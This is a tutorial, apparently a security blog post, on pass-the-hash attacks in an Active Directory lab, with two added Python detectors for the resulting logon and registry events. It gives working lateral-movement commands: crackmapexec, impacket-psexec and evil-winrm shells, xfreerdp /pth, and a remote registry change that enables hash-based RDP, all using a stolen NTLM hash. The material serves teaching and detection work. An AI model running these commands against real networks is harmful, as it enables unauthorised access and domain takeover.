Pass the Hash – Active Directory


What is Pass the Hash

A pass the hash attack occurs when an attacker obtains the hashed password of a user and uses it to authenticate themselves to other resources on the network. This is possible because the hashed password can be used in place of the plaintext password in the authentication process.

Pass the hash attacks are typically used by attackers who have already gained access to a network and are looking to move laterally and gain access to additional resources. The attacker takes an NTLM hash of a user and uses it to authenticate to the network without the need for the user’s plaintext password. This makes it easier for the attackers since they won’t have to spend time cracking the hash.

Understanding Active Directory Authentication

The LM authentication protocol, also known as LAN Manager, is an outdated and insecure method of authentication. Microsoft replaced LM with NTLM, which in turn was succeeded by NTLMv2 to address the pass the hash and replay attack weaknesses of NTLM. With the introduction of Active Directory, Microsoft made Kerberos the preferred authentication protocol, but NTLM remains enabled in Windows for compatibility, since older systems don’t support Kerberos. Windows gives administrators the option to disable NTLM authentication, but most environments leave it on. As a result, pass the hash attacks are a persistent security risk in Active Directory environments.

How are NTLM hashes obtained

Attackers use various methods to obtain NTLM hashes, but the most prevalent method is through post-exploitation activities using tools like Mimikatz. Another way is by extracting the hashes from the NTDS.dit file.

Example: There is an Active Directory Domain with a Windows machine and a Domain Controller. The attacker manages to escalate privileges on the Windows machine and runs mimikatz to dump hashes of all the users that have previously logged into the machine. The attacker finds the NTLM hash of a Domain Admin and uses that hash to authenticate to the Domain Controller.
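The scenario above leaves a trail in the Windows Security log on both ends. The following is an added example, not code from the original post: it runs two checks over constructed 4624 records shaped like a SIEM export. On the source host, a logon session created with injected credentials appears as Logon Type 9 with logon process seclogo and the Negotiate package; on the domain controller, the hash shows up as an NTLM network logon (Logon Type 3, NtLmSsp, KeyLength 0) for an account that should be using Kerberos. The privileged-account set and the DC hostname are assumptions for the example.

```python
"""Flag Security log 4624 events with pass-the-hash characteristics.

Added example; not code from the original post. Events are constructed
dictionaries carrying the 4624 fields a SIEM export would provide.
  * source host: Logon Type 9, LogonProcess "seclogo", package Negotiate,
    the session created when credentials are injected rather than typed;
  * domain controller: Logon Type 3 NTLM logon (NtLmSsp, KeyLength 0)
    for a privileged account, i.e. NTLM where Kerberos is expected.
"""
from dataclasses import dataclass

PRIVILEGED_ACCOUNTS = {"T.Stark"}   # assumption: Domain Admin accounts in this lab
DOMAIN_CONTROLLERS = {"DC01"}       # assumption: hostnames of the domain controllers

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "WS01", "TargetUserName": "T.Stark", "LogonType": 9,
     "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate",
     "IpAddress": "::1", "KeyLength": 0},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "T.Stark", "LogonType": 3,
     "LogonProcessName": "NtLmSsp", "AuthenticationPackageName": "NTLM",
     "IpAddress": "192.168.5.50", "KeyLength": 0},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "T.Stark", "LogonType": 3,
     "LogonProcessName": "Kerberos", "AuthenticationPackageName": "Kerberos",
     "IpAddress": "192.168.5.50", "KeyLength": 0},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "ANONYMOUS LOGON", "LogonType": 3,
     "LogonProcessName": "NtLmSsp", "AuthenticationPackageName": "NTLM",
     "IpAddress": "192.168.5.60", "KeyLength": 0},
]


@dataclass
class Finding:
    rule: str
    computer: str
    user: str
    source_ip: str


def is_explicit_credential_logon(ev):
    """Type 9 / seclogo / Negotiate: new logon session with injected credentials."""
    return (ev["EventID"] == 4624 and ev["LogonType"] == 9
            and ev["LogonProcessName"].lower() == "seclogo"
            and ev["AuthenticationPackageName"] == "Negotiate")


def is_privileged_ntlm_to_dc(ev, privileged, dcs):
    """NTLM network logon to a domain controller by a privileged account."""
    return (ev["EventID"] == 4624 and ev["LogonType"] == 3
            and ev["AuthenticationPackageName"] == "NTLM"
            and ev["LogonProcessName"] == "NtLmSsp"
            and ev["KeyLength"] == 0
            and ev["Computer"] in dcs
            and ev["TargetUserName"] in privileged)


def find_pth_indicators(events, privileged=PRIVILEGED_ACCOUNTS, dcs=DOMAIN_CONTROLLERS):
    """Return one Finding per event matching either indicator, in log order."""
    findings = []
    for ev in events:
        if is_explicit_credential_logon(ev):
            rule = "explicit-credential logon (type 9, seclogo)"
        elif is_privileged_ntlm_to_dc(ev, privileged, dcs):
            rule = "privileged NTLM network logon to domain controller"
        else:
            continue
        findings.append(Finding(rule, ev["Computer"], ev["TargetUserName"], ev["IpAddress"]))
    return findings


if __name__ == "__main__":
    for f in find_pth_indicators(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.user} on {f.computer} from {f.source_ip}")
```

The Kerberos logon for the same account is deliberately not flagged, and the ANONYMOUS LOGON record is excluded because it is not in the privileged set; in practice the DC rule is tuned by feeding it the real Tier-0 group membership rather than a hard-coded set.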


How to pass the hash

There are multiple services that we can exploit using the pass the hash method. These services include:

  • SMB (Port 445)
  • WinRM (Port 5985)
  • RDP (Port 3389)

Scenario: We obtained the NTLM hash for the user “T.Stark”. Let’s try different ways to get access to the Domain Controller using the hash.

Pass the Hash on SMB

Crackmapexec allows us to check whether the credentials are valid for different services.

Running crackmapexec with the smb option shows “Pwn3d!”, meaning we can log into the machine through SMB.

crackmapexec smb 192.168.5.5 -u T.Stark -H AF9627EAD6DF998951AA0BCB53301FF0

To actually get a shell we can use Impacket’s Psexec. This tool will only work if the user we have credentials for is an Admin.

impacket-psexec WANDA.local/T.Stark@192.168.5.5 -hashes "0:AF9627EAD6DF998951AA0BCB53301FF0"

Note: We have to specify 0: before the hash because psexec’s -hashes option expects two values in the form LMHASH:NTHASH; the 0 fills the unused LM half.

Pass the Hash on WinRM

We can check whether the credentials work on WinRM using crackmapexec.

crackmapexec winrm 192.168.5.5 -u 'T.Stark' -H 'AF9627EAD6DF998951AA0BCB53301FF0'

The output says “Pwn3d!”, which means that we are able to log into the machine with Admin privileges.

If the user isn’t an Admin but has permission to log in through WinRM, it will also say “Pwn3d!”.

crackmapexec winrm 192.168.5.5 -u 'J.Williams' -H 'DCD80EFD3117F7D9EC2F0911A44996FA'

To actually get a shell through WinRM, we can use a tool called “evil-winrm”.

evil-winrm -i 192.168.5.5 -u 'T.Stark' -H AF9627EAD6DF998951AA0BCB53301FF0

Pass the Hash (RDP)

Even though crackmapexec has an option to check RDP for valid credentials, it doesn’t really work. This means we can’t test the credentials first and have to go straight to attempting a connection.

We can use xfreerdp with the “/pth” option to pass the hash.

xfreerdp /v:192.168.5.5 /u:T.Stark /pth:"AF9627EAD6DF998951AA0BCB53301FF0"

The credentials seem to be correct but we get an error telling us this account has restrictions.

We can use crackmapexec with the smb option to help fix this error. If you want more details about how the command works, check this.

crackmapexec smb 192.168.5.5 -u T.Stark -H AF9627EAD6DF998951AA0BCB53301FF0 -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

If we try xfreerdp again, we don’t get an error and are able to log into the Domain Controller.
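The reg add command above is itself a strong signal for defenders: it flips DisableRestrictedAdmin to 0, which turns on Restricted Admin mode and is exactly what makes RDP accept a hash instead of a password. The hardened state is the value absent or set to 1. The following is an added example, not code from the original post: it scans constructed records shaped like Sysmon Event ID 13 (RegistryEvent, value set) and raises a finding whenever that value is written, escalating to critical when the change lands on a domain controller. The DC hostname list and the JSON field names are assumptions for the example.

```python
"""Alert on writes to DisableRestrictedAdmin seen in Sysmon registry events.

Added example; not code from the original post. Records are constructed to
resemble Sysmon Event ID 13 exported to JSON. Value 0 enables Restricted
Admin mode (RDP accepts NTLM hash logons); value 1 or an absent value is
the hardened state.
"""
import re

# Match the value name at the end of the registry path, any hive spelling.
TARGET_RE = re.compile(r"\\Control\\Lsa\\DisableRestrictedAdmin$", re.IGNORECASE)
# Sysmon writes DWORD values as "DWORD (0x00000000)".
DWORD_RE = re.compile(r"DWORD \((0x[0-9A-Fa-f]+)\)")

DOMAIN_CONTROLLERS = {"DC01"}  # assumption: hostnames of the domain controllers

# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "DC01", "User": "WANDA\\T.Stark",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Computer": "WS01", "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel",
     "Details": "DWORD (0x00000005)"},
    {"EventID": 13, "Computer": "DC01", "User": "WANDA\\Administrator",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin",
     "Details": "DWORD (0x00000001)"},
]


def parse_dword(details):
    """Return the integer in a Sysmon 'DWORD (0x...)' Details string, or None."""
    m = DWORD_RE.match(details)
    return int(m.group(1), 16) if m else None


def assess(value):
    """Map the new DisableRestrictedAdmin value to (severity, reason)."""
    if value == 0:
        return "high", "Restricted Admin mode enabled: RDP will accept NTLM hash logons"
    if value == 1:
        return "info", "Restricted Admin mode disabled: hardened state"
    return "medium", "unexpected or unparsable value"


def restricted_admin_changes(events, dcs=DOMAIN_CONTROLLERS):
    """Return one finding per Sysmon 13 event that writes DisableRestrictedAdmin."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13 or not TARGET_RE.search(ev.get("TargetObject", "")):
            continue
        value = parse_dword(ev.get("Details", ""))
        severity, reason = assess(value)
        if severity == "high" and ev.get("Computer") in dcs:
            severity = "critical"  # enabling hash-based RDP on a DC
        findings.append({
            "computer": ev.get("Computer"),
            "user": ev.get("User"),
            "image": ev.get("Image"),
            "value": value,
            "severity": severity,
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in restricted_admin_changes(SAMPLE_EVENTS):
        print(f"{f['severity'].upper():8} {f['computer']} {f['user']} via {f['image']}: {f['reason']}")
```

The second finding (value set back to 1) is kept at info severity rather than dropped, so the timeline shows who restored the hardened state and how long the window of exposure was.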


Spraying the Hashes

Crackmapexec also has an option to spray credentials, meaning that if you have a list of usernames or hashes, you can try every username against every hash to see which combinations work.

File with usernames:

Command:

This also works the other way around: if you have a list of hashes, you can spray them across the network.

Thanks for reading! Be sure to share this post if you enjoyed it.